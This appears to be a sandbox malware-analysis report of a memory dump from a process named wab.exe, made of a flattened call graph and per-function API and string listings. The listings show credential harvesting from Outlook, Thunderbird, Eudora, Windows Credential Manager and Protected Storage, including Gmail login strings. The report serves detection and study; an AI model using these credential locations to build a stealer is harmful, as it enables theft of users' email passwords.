??3@YAXPAX 33312->33314 33315 4097b8 ??3@YAXPAX 33313->33315 33316 4097bf 33313->33316 33314->33313 33315->33316 33317 4097c9 ??3@YAXPAX 33316->33317 33319 4097d0 33316->33319 33317->33319 33318 4097f0 ??2@YAPAXI ??2@YAPAXI 33318->33303 33319->33318 33320 4097e0 ??3@YAXPAX 33319->33320 33321 4097e9 ??3@YAXPAX 33319->33321 33320->33321 33321->33318 33323 4077e4 ??3@YAXPAX 33322->33323 33324 409912 33323->33324 33325 4077e4 ??3@YAXPAX 33324->33325 33326 40991a 33325->33326 33327 4077e4 ??3@YAXPAX 33326->33327 33328 409922 33327->33328 33329 4077e4 ??3@YAXPAX 33328->33329 33330 40992a 33329->33330 33331 4077ae 4 API calls 33330->33331 33332 40993d 33331->33332 33333 4077ae 4 API calls 33332->33333 33334 409947 33333->33334 33335 4077ae 4 API calls 33334->33335 33336 409951 33335->33336 33337 4077ae 4 API calls 33336->33337 33338 40995b 33337->33338 33338->33311 33340 41067e 2 API calls 33339->33340 33341 41073a 33340->33341 33342 41076d memset 33341->33342 33381 406e4c 33341->33381 33346 41078d 33342->33346 33345 401e95 strlen strlen 33345->33215 33345->33216 33384 410411 RegOpenKeyExA 33346->33384 33347 4107ba 33349 4107ef _mbscpy 33347->33349 33385 4106ad _mbscpy 33347->33385 33349->33345 33351 4107cb 33386 410452 RegQueryValueExA 33351->33386 33353 4107e3 RegCloseKey 33353->33349 33354->33219 33355->33225 33387 410411 RegOpenKeyExA 33356->33387 33358 401c4b 33359 401cac 33358->33359 33388 410452 RegQueryValueExA 33358->33388 33359->33229 33359->33231 33361 401c69 33362 401c70 strchr 33361->33362 33363 401ca3 RegCloseKey 33361->33363 33362->33363 33364 401c84 strchr 33362->33364 33363->33359 33364->33363 33365 401c93 33364->33365 33389 406ca4 strlen 33365->33389 33367 401ca0 33367->33363 33368->33230 33369->33235 33370->33216 33371->33221 33372->33248 33392 410411 RegOpenKeyExA 33373->33392 33375 4104a9 33376 4104d2 33375->33376 33393 410452 RegQueryValueExA 33375->33393 33376->33248 33378 4104c1 RegCloseKey 33378->33376 33380->33248 33382 406e5b GetVersionExA 33381->33382 33383 406e6c 33381->33383 33382->33383 33383->33342 33383->33345 33384->33347 33385->33351 33386->33353 33387->33358 33388->33361 33390 406cb5 33389->33390 33391 406cb8 memcpy 33389->33391 33390->33391 33391->33367 33392->33375 33393->33378 33395 4098ad 33394->33395 33397 4098bb 33394->33397 33402 409669 memset SendMessageA 33395->33402 33398 409906 33397->33398 33399 4098f8 33397->33399 33398->33260 33403 4095d9 SendMessageA 33399->33403 33401->33256 33402->33397 33403->33398 33404->33263 33405->33265 33407 404780 FreeLibrary 33406->33407 33408 404736 LoadLibraryA 33407->33408 33409 404747 GetProcAddress 33408->33409 33410 404769 33408->33410 33409->33410 33411 40475f 33409->33411 33412 40477c 33410->33412 33413 404780 FreeLibrary 33410->33413 33411->33410 33412->33265 33413->33412 33415 404794 FreeLibrary 33414->33415 33416 40479e 33414->33416 33415->33416 33416->33265 33418 410166 FreeLibrary 33417->33418 33419 403c1d LoadLibraryA 33418->33419 33420 403c61 33419->33420 33421 403c31 GetProcAddress 33419->33421 33423 410166 FreeLibrary 33420->33423 33421->33420 33422 403c4b 33421->33422 33422->33420 33426 403c58 33422->33426 33424 403c68 33423->33424 33425 40472f 3 API calls 33424->33425 33427 403c73 33425->33427 33426->33424 33497 4036d7 33427->33497 33430 4036d7 26 API calls 33431 403c87 33430->33431 33432 4036d7 26 API calls 33431->33432 33433 403c91 33432->33433 33434 4036d7 26 API calls 33433->33434 33435 403c9b 33434->33435 33509 408344 33435->33509 33443 403cd2 33444 403ce4 33443->33444 33692 402bc3 39 API calls 33443->33692 33557 410411 RegOpenKeyExA 33444->33557 33447 403cf7 33448 403d09 33447->33448 33693 402bc3 39 API calls 33447->33693 33558 402c4f 33448->33558 33452 406e4c GetVersionExA 33453 403d1e 33452->33453 33576 410411 RegOpenKeyExA 33453->33576 33455 403d3e 33456 403d4e 33455->33456 33694 402b14 46 API calls 33455->33694 33577 410411 RegOpenKeyExA 33456->33577 33459 403d74 33460 403d84 33459->33460 33695 402b14 46 API calls 33459->33695 33578 410411 RegOpenKeyExA 33460->33578 33463 403daa 33464 403dba 33463->33464 33696 402b14 46 API calls 33463->33696 33579 41017d 33464->33579 33468 404780 FreeLibrary 33469 403dd5 33468->33469 33583 402fcd 33469->33583 33472 402fcd 34 API calls 33473 403ded 33472->33473 33599 4032a9 33473->33599 33482 403e28 33484 403e60 33482->33484 33485 403e33 _mbscpy 33482->33485 33646 40f478 33484->33646 33698 40eca9 303 API calls 33485->33698 33494 410171 FreeLibrary 33493->33494 33495 41017c 33493->33495 33494->33495 33495->33265 33496->33266 33498 4036ed 33497->33498 33501 4037b7 33497->33501 33699 4101d8 UuidFromStringA UuidFromStringA memcpy 33498->33699 33500 403700 33500->33501 33502 403708 strchr 33500->33502 33501->33430 33502->33501 33503 403722 33502->33503 33700 4021ad memset 33503->33700 33505 403731 _mbscpy _mbscpy strlen 33506 403796 _mbscpy 33505->33506 33507 40377b sprintf 33505->33507 33701 4023d7 16 API calls 33506->33701 33507->33506 33510 408354 33509->33510 33702 408043 11 API calls 33510->33702 33514 408372 33515 403ca7 33514->33515 33516 40837d memset 33514->33516 33527 407f93 33515->33527 33705 4104d7 RegEnumKeyExA 33516->33705 33518 408444 RegCloseKey 33518->33515 33520 4083a9 33520->33518 33521 4083ce memset 33520->33521 33706 410411 RegOpenKeyExA 33520->33706 33709 4104d7 RegEnumKeyExA 33520->33709 33707 410452 RegQueryValueExA 33521->33707 33524 408406 33708 4081fd 10 API calls 33524->33708 33526 40841d RegCloseKey 33526->33520 33710 410411 RegOpenKeyExA 33527->33710 33529 407fb5 33530 403cb3 33529->33530 33531 407fbc memset 33529->33531 33539 408458 33530->33539 33711 4104d7 RegEnumKeyExA 33531->33711 33533 408035 RegCloseKey 33533->33530 33535 407fe5 33535->33533 33712 410411 RegOpenKeyExA 33535->33712 33713 407e63 11 API calls 33535->33713 33714 4104d7 RegEnumKeyExA 33535->33714 33538 408018 RegCloseKey 33538->33535 33715 4045d6 33539->33715 33542 408660 33723 404651 33542->33723 33544 4084a5 33544->33542 33547 4084af wcslen 33544->33547 33546 4084a3 CredEnumerateW 33546->33544 33547->33542 33554 4084e2 33547->33554 33548 4084ec _wcsncoll 33548->33554 33550 40472f 3 API calls 33550->33554 33551 404780 FreeLibrary 33551->33554 33552 408584 memset 33553 4085b1 memcpy wcschr 33552->33553 33552->33554 33553->33554 33554->33542 33554->33548 33554->33550 33554->33551 33554->33552 33554->33553 33555 408634 LocalFree 33554->33555 33726 404666 _mbscpy 33554->33726 33555->33554 33556 410411 RegOpenKeyExA 33556->33443 33557->33447 33727 410411 RegOpenKeyExA 33558->33727 33560 402c6c 33561 402d97 33560->33561 33562 402c79 memset 33560->33562 33561->33452 33728 4104d7 RegEnumKeyExA 33562->33728 33564 402d8e RegCloseKey 33564->33561 33565 410493 3 API calls 33566 402cd6 memset sprintf 33565->33566 33729 410411 RegOpenKeyExA 33566->33729 33568 402d1a 33569 402d2c sprintf 33568->33569 33730 402bc3 39 API calls 33568->33730 33731 410411 RegOpenKeyExA 33569->33731 33574 402ca4 33574->33564 33574->33565 33575 402d8c 33574->33575 33732 402bc3 39 API calls 33574->33732 33733 4104d7 RegEnumKeyExA 33574->33733 33575->33564 33576->33455 33577->33459 33578->33463 33580 41018b 33579->33580 33581 410166 FreeLibrary 33580->33581 33582 403dca 33581->33582 33582->33468 33734 410411 RegOpenKeyExA 33583->33734 33585 402feb 33586 402ff8 memset 33585->33586 33587 40311e 33585->33587 33735 4104d7 RegEnumKeyExA 33586->33735 33587->33472 33589 403114 RegCloseKey 33589->33587 33590 403025 33590->33589 33591 410493 3 API calls 33590->33591 33594 403094 memset 33590->33594 33596 4030eb RegCloseKey 33590->33596 33598 4104d7 RegEnumKeyExA 33590->33598 33738 402da5 26 API calls 33590->33738 33592 40304a memset sprintf 33591->33592 33736 410411 RegOpenKeyExA 33592->33736 33737 4104d7 RegEnumKeyExA 33594->33737 33596->33590 33598->33590 33600 4032c7 33599->33600 33601 40339b 33599->33601 33739 4021ad memset 33600->33739 33614 4034d6 memset memset 33601->33614 33603 4032d3 33740 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33603->33740 33605 4032dc 33606 4032ea memset GetPrivateProfileSectionA 33605->33606 33741 4023d7 16 API calls 33605->33741 33606->33601 33608 403321 33606->33608 33608->33601 33609 40338d strlen 33608->33609 33742 4021ad memset 33608->33742 33743 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33608->33743 33744 4023d7 16 API calls 33608->33744 33609->33601 33609->33608 33611 403342 strchr 33611->33608 33615 410493 3 API calls 33614->33615 33616 403531 33615->33616 33617 403571 33616->33617 33618 403538 _mbscpy 33616->33618 33622 403977 33617->33622 33745 406af3 strlen _mbscat 33618->33745 33620 403557 _mbscat 33746 4033e2 19 API calls 33620->33746 33747 404666 _mbscpy 33622->33747 33626 40399c 33628 4039f1 33626->33628 33748 40edd5 memset memset 33626->33748 33769 40f057 33626->33769 33785 4038da 21 API calls 33626->33785 33629 404780 FreeLibrary 33628->33629 33630 4039fd 33629->33630 33631 4037bc memset memset 33630->33631 33793 443a35 memset 33631->33793 33634 4038d4 33634->33482 33697 40eca9 303 API calls 33634->33697 33636 403820 33637 406ca4 2 API calls 33636->33637 33638 403835 33637->33638 33639 406ca4 2 API calls 33638->33639 33640 403847 strchr 33639->33640 33641 403876 _mbscpy 33640->33641 33642 403889 strlen 33640->33642 33643 4038b1 _mbscpy 33641->33643 33642->33643 33644 403896 sprintf 33642->33644 33805 4023d7 16 API calls 33643->33805 33644->33643 33647 4446d0 33646->33647 33648 40f488 RegOpenKeyExA 33647->33648 33649 40f4b3 RegOpenKeyExA 33648->33649 33650 403e6c 33648->33650 33651 40f5a5 RegCloseKey 33649->33651 33652 40f4cd RegQueryValueExA 33649->33652 33660 40f2e4 33650->33660 33651->33650 33653 40f59b RegCloseKey 33652->33653 33654 40f4fc 33652->33654 33653->33651 33655 40472f 3 API calls 33654->33655 33656 40f509 33655->33656 33656->33653 33657 40f591 LocalFree 33656->33657 33658 40f555 memcpy memcpy 33656->33658 33657->33653 33810 40f177 11 API calls 33658->33810 33661 406e4c GetVersionExA 33660->33661 33662 40f305 33661->33662 33663 4045d6 7 API calls 33662->33663 33666 40f321 33663->33666 33664 404651 FreeLibrary 33665 403e72 33664->33665 33672 4437d7 memset 33665->33672 33667 40f45e 33666->33667 33668 40f38b memset WideCharToMultiByte 33666->33668 33667->33664 33668->33666 33669 40f3bb _strnicmp 33668->33669 33669->33666 33670 40f3d3 WideCharToMultiByte 33669->33670 33670->33666 33671 40f400 WideCharToMultiByte 33670->33671 33671->33666 33673 41072b 9 API calls 33672->33673 33674 443816 33673->33674 33811 40732d strlen strlen 33674->33811 33679 41072b 9 API calls 33680 44383d 33679->33680 33681 40732d 3 API calls 33680->33681 33682 443847 33681->33682 33683 4436ff 65 API calls 33682->33683 33684 443853 memset memset 33683->33684 33685 410493 3 API calls 33684->33685 33686 4438a6 ExpandEnvironmentStringsA strlen 33685->33686 33687 4438e1 _strcmpi 33686->33687 33688 4438d2 33686->33688 33689 403e7e 33687->33689 33690 4438f9 33687->33690 33688->33687 33689->33265 33691 4436ff 65 API calls 33690->33691 33691->33689 33692->33444 33693->33448 33694->33456 33695->33460 33696->33464 33697->33482 33698->33484 33699->33500 33700->33505 33701->33501 33703 40818e 33702->33703 33704 410411 RegOpenKeyExA 33703->33704 33704->33514 33705->33520 33706->33520 33707->33524 33708->33526 33709->33520 33710->33529 33711->33535 33712->33535 33713->33538 33714->33535 33716 404651 FreeLibrary 33715->33716 33717 4045de LoadLibraryA 33716->33717 33718 40464c 33717->33718 33719 4045ef GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33717->33719 33718->33542 33718->33544 33718->33546 33720 404638 33719->33720 33721 40463e 33720->33721 33722 404651 FreeLibrary 33720->33722 33721->33718 33722->33718 33724 403cbf 33723->33724 33725 404657 FreeLibrary 33723->33725 33724->33556 33725->33724 33726->33554 33727->33560 33728->33574 33729->33568 33730->33569 33731->33574 33732->33574 33733->33574 33734->33585 33735->33590 33736->33590 33737->33590 33738->33590 33739->33603 33740->33605 33741->33606 33742->33611 33743->33608 33744->33608 33745->33620 33746->33617 33747->33626 33786 407649 33748->33786 33751 407649 _mbsnbcat 33752 40ef18 RegOpenKeyExA 33751->33752 33753 40ef38 RegQueryValueExA 33752->33753 33754 40f04e 33752->33754 33755 40f045 RegCloseKey 33753->33755 33756 40ef65 33753->33756 33754->33626 33755->33754 33756->33755 33765 40efea 33756->33765 33790 404666 _mbscpy 33756->33790 33758 40ef86 33760 40472f 3 API calls 33758->33760 33766 40ef8b 33760->33766 33761 40f013 RegQueryValueExA 33761->33755 33762 40f036 33761->33762 33762->33755 33763 40efdf 33764 404780 FreeLibrary 33763->33764 33764->33765 33765->33755 33791 4012ee strlen 33765->33791 33766->33763 33767 40efd6 LocalFree 33766->33767 33768 40efba memcpy 33766->33768 33767->33763 33768->33767 33792 404666 _mbscpy 33769->33792 33771 40f06f 33772 4045d6 7 API calls 33771->33772 33773 40f07d 33772->33773 33774 40f157 33773->33774 33775 40472f 3 API calls 33773->33775 33776 404651 FreeLibrary 33774->33776 33780 40f08a 33775->33780 33777 40f166 33776->33777 33778 404780 FreeLibrary 33777->33778 33779 40f171 33778->33779 33779->33626 33780->33774 33781 40f10c WideCharToMultiByte 33780->33781 33782 40f12d strlen 33781->33782 33783 40f14e LocalFree 33781->33783 33782->33783 33784 40f13d _mbscpy 33782->33784 33783->33774 33784->33783 33785->33626 33787 407675 33786->33787 33788 407656 _mbsnbcat 33787->33788 33789 407679 33787->33789 33788->33787 33789->33751 33790->33758 33791->33761 33792->33771 33806 410411 RegOpenKeyExA 33793->33806 33795 443a6f 33796 40380c 33795->33796 33807 410452 RegQueryValueExA 33795->33807 33796->33634 33804 4021ad memset 33796->33804 33798 443a88 33799 443ac0 RegCloseKey 33798->33799 33808 410452 RegQueryValueExA 33798->33808 33799->33796 33801 443aa5 33801->33799 33809 443d5d 30 API calls 33801->33809 33803 443abe 33803->33799 33804->33636 33805->33634 33806->33795 33807->33798 33808->33801 33809->33803 33810->33657 33812 407358 33811->33812 33813 40734a _mbscat 33811->33813 33814 4436ff 33812->33814 33813->33812 33831 407c2c 33814->33831 33817 44373a 33818 443761 33817->33818 33819 443745 33817->33819 33839 407c87 33817->33839 33820 407c2c 9 API calls 33818->33820 33852 443683 52 API calls 33819->33852 33828 44378d 33820->33828 33822 407c87 9 API calls 33822->33828 33823 4437bb 33849 407d1f 33823->33849 33827 407d1f FindClose 33829 4437d1 33827->33829 33828->33822 33828->33823 33830 4436ff 65 API calls 33828->33830 33853 407bf1 strcmp strcmp 33828->33853 33829->33679 33830->33828 33832 407d1f FindClose 33831->33832 33833 407c39 33832->33833 33834 406ca4 2 API calls 33833->33834 33835 407c4c strlen strlen 33834->33835 33836 407c70 33835->33836 33837 407c79 33835->33837 33854 406e81 strlen _mbscat _mbscpy _mbscat 33836->33854 33837->33817 33840 407c92 FindFirstFileA 33839->33840 33841 407cb3 FindNextFileA 33839->33841 33842 407cce 33840->33842 33843 407cd5 strlen strlen 33841->33843 33844 407cc9 33841->33844 33842->33843 33846 407d0e 33842->33846 33843->33846 33847 407d05 33843->33847 33845 407d1f FindClose 33844->33845 33845->33842 33846->33817 33855 406e81 strlen _mbscat _mbscpy _mbscat 33847->33855 33850 407d32 33849->33850 33851 407d28 FindClose 33849->33851 33850->33827 33851->33850 33852->33817 33853->33828 33854->33837 33855->33846 33856->33282 33857->33278 33858->33289 33859->33290 33860->33296 33861->33293 33862->33288 34032 426928 CloseHandle memset memset 34190 405f2b 12 API calls 34192 42df2e 127 API calls 32966 410531 32969 410344 32966->32969 32970 410351 32969->32970 32971 410398 memset GetPrivateProfileStringA 32970->32971 32972 41035f memset 32970->32972 32977 4073d5 strlen 32971->32977 32982 40735c sprintf memcpy 32972->32982 32975 410381 WritePrivateProfileStringA 32976 4103da 32975->32976 32978 4073e9 32977->32978 32980 4073eb 32977->32980 32978->32976 32979 407432 32979->32976 32980->32979 32983 40710b strtoul 32980->32983 32982->32975 32983->32980 34193 43f332 133 API calls 34195 418f35 61 API calls 34197 425e13 109 API calls 34039 411136 InterlockedCompareExchange RtlInitializeCriticalSection 34041 425e13 19 API calls 34045 440132 34 API calls 34047 4111c1 RtlInitializeCriticalSection memset 34202 4157c8 16 API calls 34204 43f3ce 138 API calls 34050 4275cd 44 API calls 34206 424852 108 API calls 34208 42dbd4 18 API calls 34053 40c5d8 18 API calls 34209 432bda 16 API calls 34210 43ebd9 22 API calls 33882 4105dd FindResourceA 33883 4105f6 SizeofResource 33882->33883 33886 410620 33882->33886 33884 410607 LoadResource 33883->33884 33883->33886 33885 410615 LockResource 33884->33885 33884->33886 33885->33886 34213 4013de 15 API calls 34216 424852 76 API calls 34057 4141e7 15 API calls 34218 43ebdd 25 API calls 34219 43efec 18 API calls 34221 443ff5 _onexit 34059 4021f6 14 API calls 34223 427bfb 36 API calls 34061 433982 16 API calls 34063 411182 InterlockedCompareExchange RtlDeleteCriticalSection 34226 412786 _endthreadex 34064 401591 8 API calls 34229 432b91 15 API calls 34230 43eb91 17 API calls 34067 410597 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34231 43ff95 20 API calls 34232 42af9d 31 API calls 34233 424852 119 API calls 34235 4143a4 18 API calls 34238 409fae 12 API calls 34072 419db5 42 API calls 34239 4167b5 memset 34240 4293b4 10 API calls 34073 40f5b8 70 API calls 34075 4375b9 22 API calls 34245 4243bd 15 API calls

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004080A5
                                                                                                                                                • memset.MSVCRT ref: 004080B9
                                                                                                                                                • memset.MSVCRT ref: 004080D3
                                                                                                                                                • memset.MSVCRT ref: 004080E8
                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                • strlen.MSVCRT ref: 0040815B
                                                                                                                                                • strlen.MSVCRT ref: 0040816A
                                                                                                                                                • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                                                • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 435 407cce-407cd3 433->435 436 407cd5-407d03 strlen * 2 434->436 437 407cc9 call 407d1f 434->437 435->436 439 407d18-407d1e 435->439 440 407d12 436->440 441 407d05-407d10 call 406e81 436->441 437->435 443 407d15-407d17 440->443 441->443 443->439
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                                                • String ID: .8D
                                                                                                                                                • API String ID: 379999529-2881260426
                                                                                                                                                • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00401E82
                                                                                                                                                • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                • memset.MSVCRT ref: 00401FA8
                                                                                                                                                • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                • memset.MSVCRT ref: 00401FFA
                                                                                                                                                • sprintf.MSVCRT ref: 00402027
                                                                                                                                                  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                • memset.MSVCRT ref: 0040207D
                                                                                                                                                • memset.MSVCRT ref: 00402092
                                                                                                                                                • strlen.MSVCRT ref: 00402098
                                                                                                                                                • strlen.MSVCRT ref: 004020A6
                                                                                                                                                • strlen.MSVCRT ref: 004020D9
                                                                                                                                                • strlen.MSVCRT ref: 004020E7
                                                                                                                                                • memset.MSVCRT ref: 0040200F
                                                                                                                                                  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                • ExpandEnvironmentStringsA.KERNELBASE(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                • API String ID: 1846531875-4223776976
                                                                                                                                                • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                  • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                  • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                  • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                • API String ID: 745651260-375988210
                                                                                                                                                • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
